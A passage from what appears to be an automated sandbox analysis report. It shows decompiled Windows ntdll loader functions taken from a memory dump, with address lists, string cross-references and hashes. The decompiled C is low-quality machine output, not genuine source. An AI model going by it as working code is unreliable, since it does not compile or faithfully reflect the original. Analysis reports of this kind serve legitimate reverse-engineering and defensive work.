								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E03661370(_t284, 0x35f4e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0365BB40(_t267,  &_v68, _t224);
						if(L036243C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x03623d3c
0x03623d42
0x03623d44
0x03623d46
0x03623d49
0x03623d4c
0x03623d4f
0x03623d52
0x03623d55
0x03623d58
0x03623d5b
0x03623d5f
0x03623d61
0x03623d66
0x03678213
0x03678218
0x03624085
0x03624088
0x0362408e
0x03624094
0x0362409a
0x036240a0
0x036240a6
0x036240a9
0x036240af
0x036240b6
0x036240bd
0x036240bd
0x03623d83
0x0367821f
0x03678229
0x03678238
0x03678238
0x0367823d
0x0367823d
0x03623da0
0x03623daf
0x03623db5
0x03623dba
0x03623dba
0x03623dd4
0x03623e94
0x03623eab
0x03623f6d
0x03623f84
0x0362406b
0x0362406b
0x0362406e
0x0362406e
0x03624070
0x03624074
0x03678351
0x03678351
0x0362407a
0x0362407f
0x0367835d
0x03678370
0x03678377
0x03678379
0x0367837c
0x0367837c
0x0367835d
0x00000000
0x0362407f
0x03623f8a
0x03623f8d
0x03623f90
0x03623f95
0x0367830d
0x0367830f
0x03623f9b
0x03623fac
0x03623fae
0x03623fb1
0x03623fb1
0x03623fb6
0x03678317
0x0367831a
0x00000000
0x03623fbc
0x03623fc1
0x03623fc9
0x03623fd7
0x03623fda
0x03623fdd
0x03624021
0x03624021
0x03624029
0x03624030
0x03624044
0x03624046
0x03624046
0x03624044
0x03624049
0x03678327
0x03678334
0x03678339
0x0367833c
0x0362404f
0x0362404f
0x0362404f
0x03624051
0x03624056
0x03624063
0x03624063
0x03624068
0x00000000
0x03624068
0x03623fdf
0x03623fe2
0x03623fe4
0x03623fe7
0x03623fef
0x03624003
0x03624005
0x03624005
0x0362400c
0x03624013
0x03624016
0x03624017
0x0362401b
0x0362401e
0x00000000
0x0362401e
0x03623fb6
0x03623eb1
0x03623eb4
0x03623eb7
0x03623ebc
0x036782a9
0x036782ab
0x03623ec2
0x03623ed3
0x03623ed5
0x03623ed8
0x03623ed8
0x03623edd
0x036782b3
0x036782b6
0x00000000
0x03623ee3
0x03623ee8
0x03623eed
0x03623ef0
0x03623ef3
0x03623f02
0x03623f05
0x03623f08
0x036782c0
0x036782c3
0x036782c5
0x036782c8
0x036782d0
0x036782e4
0x036782e6
0x036782e6
0x036782ed
0x036782f4
0x036782f7
0x036782f8
0x036782fc
0x036782ff
0x036782ff
0x03623f0e
0x03623f11
0x03623f16
0x03623f1d
0x03623f31
0x03678307
0x03678307
0x03623f31
0x03623f39
0x03623f48
0x03623f4d
0x03623f50
0x03623f50
0x03623f53
0x03623f58
0x03623f65
0x03623f65
0x03623f6a
0x00000000
0x03623f6a
0x03623edd
0x03623dda
0x03623ddd
0x03623de0
0x03623de5
0x03678245
0x03623deb
0x03623df7
0x03623dfc
0x03623dfe
0x03623e01
0x03623e01
0x03623e06
0x0367824d
0x0367824f
0x03678254
0x00000000
0x03623e0c
0x03623e11
0x03623e16
0x03623e19
0x03623e29
0x03623e2c
0x03623e2f
0x0367825c
0x0367825f
0x03678261
0x03678264
0x0367826c
0x03678280
0x03678282
0x03678282
0x03678289
0x03678290
0x03678293
0x03678294
0x03678298
0x0367829b
0x0367829b
0x03623e35
0x03623e38
0x03623e3d
0x03623e44
0x03623e58
0x036782a3
0x036782a3
0x03623e58
0x03623e60
0x03623e6f
0x03623e74
0x03623e77
0x03623e77
0x03623e7a
0x03623e7f
0x03623e8c
0x03623e8c
0x03623e91
0x00000000
0x03623e91

Strings

WindowsExcludedProcs, xrefs: 03623D6F
Kernel-MUI-Language-Disallowed, xrefs: 03623E97
Kernel-MUI-Language-SKU, xrefs: 03623F70
Kernel-MUI-Language-Allowed, xrefs: 03623DC0
Kernel-MUI-Number-Allowed, xrefs: 03623D8C

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 70ec302f8cb952c6ae69e4a3e168b6c737c0e1382e39eebd4fa7136daaaf2f24
Instruction ID: 1682694a11174959b09f751323cac0ee53f27cc59ce1480c3358d2e5a4a7cf26
Opcode Fuzzy Hash: 70ec302f8cb952c6ae69e4a3e168b6c737c0e1382e39eebd4fa7136daaaf2f24
Instruction Fuzzy Hash: 21F15D76D00629EFCB11DF99C984AEEBBB9FF48650F15006AE905AB310DB349E01CF94

Uniqueness

Uniqueness Score: -1.00%

Function 03648E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E03648E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x370d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x3708464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x3705780 & 0x00000003) != 0) {
							E03695510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x3705780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0365B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x3707984; // 0x2bb2ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x3708464; // 0x74b10110
					 *0x370b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E03649B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x3705780 & 0x00000005) != 0) {
						_push(_t49);
						E03695510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x03648e0f
0x03648e16
0x03648e19
0x03648e1b
0x03648e21
0x03648e7f
0x03648e85
0x03689354
0x0368936c
0x03689371
0x0368937b
0x03689381
0x03689381
0x0368937b
0x03648e9d
0x03648e9d
0x03648e29
0x03648e2c
0x03648e38
0x03648e3e
0x03648e43
0x03648eb5
0x03648eb9
0x036892aa
0x036892af
0x036892e8
0x036892e8
0x036892af
0x03648eb9
0x03648e45
0x03648e53
0x03648e5b
0x03648e5f
0x03648e78
0x03648e78
0x03648e7d
0x03648ec3
0x03648ecd
0x03648ed2
0x03648ed2
0x03648ec5
0x03648ec5
0x00000000
0x03648e7d
0x03648e67
0x03648ea4
0x0368931a
0x00000000
0x00000000
0x03689320
0x03648ea4
0x03648e70
0x03689325
0x03689340
0x03689345
0x03689345
0x03648e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 0368933B, 03689367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0368932A
LdrpFindDllActivationContext, xrefs: 03689331, 0368935D
Querying the active activation context failed with status 0x%08lx, xrefs: 03689357

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: c7a958c52e868fd3224c26d346dfe999f492d85f0c0c38c1bbb092d12d0aa929
Instruction ID: eece2c954a293a9ec21a625ab13bc015d843f0848b4800d9906a0f4a9219631f
Opcode Fuzzy Hash: c7a958c52e868fd3224c26d346dfe999f492d85f0c0c38c1bbb092d12d0aa929
Instruction Fuzzy Hash: E3413B31E00311DFDF35FB18C949A3AB6B8BB45758F0D81A9EA0457262EB729C808783

Uniqueness

Uniqueness Score: -1.00%

Function 03628794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E03628794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0362934A() != 0) {
								_t159 = E0369A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x3705780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E03695510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x3705780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0362849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E03628999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E03628999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x3705c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x3705c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E03632280(_t92, 0x37086cc);
															_t94 = E036E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E036461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x3705c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E03628A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x3705c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x3705c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0365F380(_t136, 0x35f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E03632280(_t108, 0x37086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E036461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E036E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0362FFB0(_t118, _t156, 0x37086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E03659A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x03628799
0x0362879d
0x036287a1
0x036287a3
0x036287a8
0x036287c3
0x036287c3
0x036287c8
0x036287d1
0x036287d4
0x036287d8
0x036287e5
0x036287ec
0x03679bfe
0x03679c00
0x03679c02
0x03679c08
0x03679c0d
0x03679c0f
0x03679c14
0x03679c2d
0x03679c32
0x03679c37
0x03679c3a
0x03679c3c
0x03679c42
0x03679c42
0x03679c3c
0x03679c02
0x036287da
0x036287df
0x036287e3
0x00000000
0x00000000
0x036287e3
0x036287f2
0x00000000
0x036287fb
0x036287fd
0x036287fe
0x0362880e
0x0362880f
0x03628810
0x03628814
0x0362881a
0x0362881c
0x0362881f
0x03628821
0x03628822
0x03628824
0x03628826
0x0362882c
0x0362882e
0x03679c48
0x03679c48
0x03628834
0x03628834
0x03628837
0x00000000
0x00000000
0x03628837
0x0362882e
0x0362883d
0x03628840
0x03628843
0x03628846
0x03628849
0x0362884c
0x0362884e
0x03628850
0x03628852
0x03628854
0x03628857
0x036288b4
0x036288b6
0x036288b6
0x03628859
0x03628859
0x03628859
0x03628861
0x03628866
0x0362886a
0x0362893d
0x03628941
0x00000000
0x03628947
0x03628947
0x0362894a
0x0362894c
0x00000000
0x03628952
0x03628955
0x0362895a
0x0362895d
0x0362895d
0x0362895f
0x03628961
0x03628961
0x03628968
0x00000000
0x00000000
0x0362896a
0x0362896b
0x0362896e
0x00000000
0x03628970
0x03628970
0x03628970
0x03628970
0x03628972
0x03628972
0x03628974
0x00000000
0x0362897a
0x0362897a
0x0362897d
0x00000000
0x03628983
0x03679c65
0x03679c6d
0x03679c72
0x03679c75
0x03679c75
0x03679c82
0x03679c86
0x03679c87
0x03679c88
0x03679c89
0x03679c8c
0x03679c90
0x03679c95
0x03679c97
0x03679ca0
0x03679ca3
0x03679ca9
0x03679ca9
0x00000000
0x03679ca9
0x03679ca3
0x00000000
0x03679c97
0x0362897d
0x00000000
0x03628974
0x03628988
0x03628992
0x03628996
0x00000000
0x03628996
0x0362894c
0x00000000
0x03628870
0x0362887b
0x0362887d
0x0362887f
0x03628881
0x03628884
0x03628884
0x03628886
0x03628889
0x0362888c
0x0362888e
0x03628891
0x03628891
0x03628898
0x00000000
0x00000000
0x0362889a
0x0362889b
0x0362889e
0x00000000
0x00000000
0x036288a0
0x036288a8
0x036288b0
0x036288b2
0x036288d3
0x036288d5
0x00000000
0x036288d7
0x036288db
0x036288dc
0x036288e0
0x036288e8
0x036288ee
0x036288f0
0x036288f3
0x036288fc
0x03628901
0x03628906
0x0362890c
0x0362890c
0x0362890f
0x03628916
0x03628917
0x03628918
0x03628919
0x0362891a
0x0362891f
0x03628921
0x03679c52
0x03679c55
0x03679c5b
0x03679cac
0x03679cc0
0x03679cc0
0x03679c55
0x03628927
0x03628927
0x0362892f
0x03628933
0x00000000
0x036288f5
0x036288f5
0x00000000
0x036288f7
0x036288f7
0x036288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x036288fa
0x036288f5
0x036288f3
0x00000000
0x036288d5
0x00000000
0x036288b2
0x036288c9
0x00000000
0x036288c9
0x0362887f
0x0362886a
0x03628857
0x03628852
0x036288bf
0x036288bf
0x036287aa
0x036287ad
0x036287ae
0x036287b4
0x036287b5
0x036287b6
0x036287b8
0x036287bd
0x036287c1
0x036287f4
0x036287fa
0x00000000
0x00000000
0x00000000
0x036287c1
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 03679C28
LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03679C18
LdrpDoPostSnapWork, xrefs: 03679C1E

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: 8229329fd02db10cf71f3692ced241e33dcc5095744d834369d12fc169f8f786
Instruction ID: ec038f79251f2d23798b13265f89384aeb7e1100c290a7d1232ee9de708e975a
Opcode Fuzzy Hash: 8229329fd02db10cf71f3692ced241e33dcc5095744d834369d12fc169f8f786
Instruction Fuzzy Hash: 1E910331A00A26DFDF18DF59C980ABABBF5FF55314B4A8169DC05AB250DB30A901CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03627E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03627E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0362CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0361C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3705780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E03695510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3705780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03637D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03637D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E03697016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03637D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03637D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E03697016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0364A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0361B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x03627e4c
0x03627e50
0x03627e55
0x03627e58
0x03627e5d
0x03627e71
0x03627f33
0x03627e77
0x03627e77
0x03627e79
0x03627e79
0x03627e7e
0x03627f45
0x03679848
0x00000000
0x03679848
0x03627f4e
0x03627f53
0x03627f5a
0x00000000
0x00000000
0x0367985a
0x03679862
0x03679866
0x00000000
0x0367986c
0x00000000
0x0367986c
0x03627e84
0x03627e84
0x03627e8d
0x03679871
0x03627eb8
0x03627ec0
0x03627ec0
0x03627e9a
0x0367987e
0x00000000
0x00000000
0x03679884
0x0367988b
0x036798a7
0x036798ac
0x036798b1
0x036798b6
0x036798b8
0x036798b8
0x036798b9
0x00000000
0x036798b9
0x03627ea0
0x03627ea7
0x00000000
0x00000000
0x03627eac
0x03627eb1
0x03627ec6
0x03627ed0
0x036798cc
0x03627ed6
0x03627ed6
0x03627ed6
0x03627ede
0x03627ee3
0x036798e3
0x036798f0
0x03679902
0x036798f2
0x036798fb
0x036798fb
0x03679907
0x0367991d
0x0367991d
0x03679907
0x036798e3
0x03627ef0
0x03627f14
0x03627f14
0x03627f1e
0x03679946
0x03627f24
0x03627f24
0x03627f24
0x03627f2c
0x0367996a
0x03679975
0x03679975
0x0367997e
0x03679993
0x03679993
0x0367997e
0x00000000
0x03627ef2
0x03627efc
0x03627f0a
0x03627f0e
0x03679933
0x00000000
0x03679933
0x00000000
0x03627f0e
0x00000000
0x00000000
0x00000000
0x03627eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 036798A2
Could not validate the crypto signature for DLL %wZ, xrefs: 03679891
LdrpCompleteMapModule, xrefs: 03679898

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 8c08ce2722f1e37a5f149d198ae1032732d2ae7c315f47c97f5a3443150e167f
Instruction ID: 4c48f3d35d836445fe041d87fdbd4c26c9a02d3fbe68386a69022c1d7c82c13b
Opcode Fuzzy Hash: 8c08ce2722f1e37a5f149d198ae1032732d2ae7c315f47c97f5a3443150e167f
Instruction Fuzzy Hash: 1751F231A04B459BEB21CB68CA44F6ABBE4FF01314F490599E8A19B7E2D730ED01CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0361E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0361E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
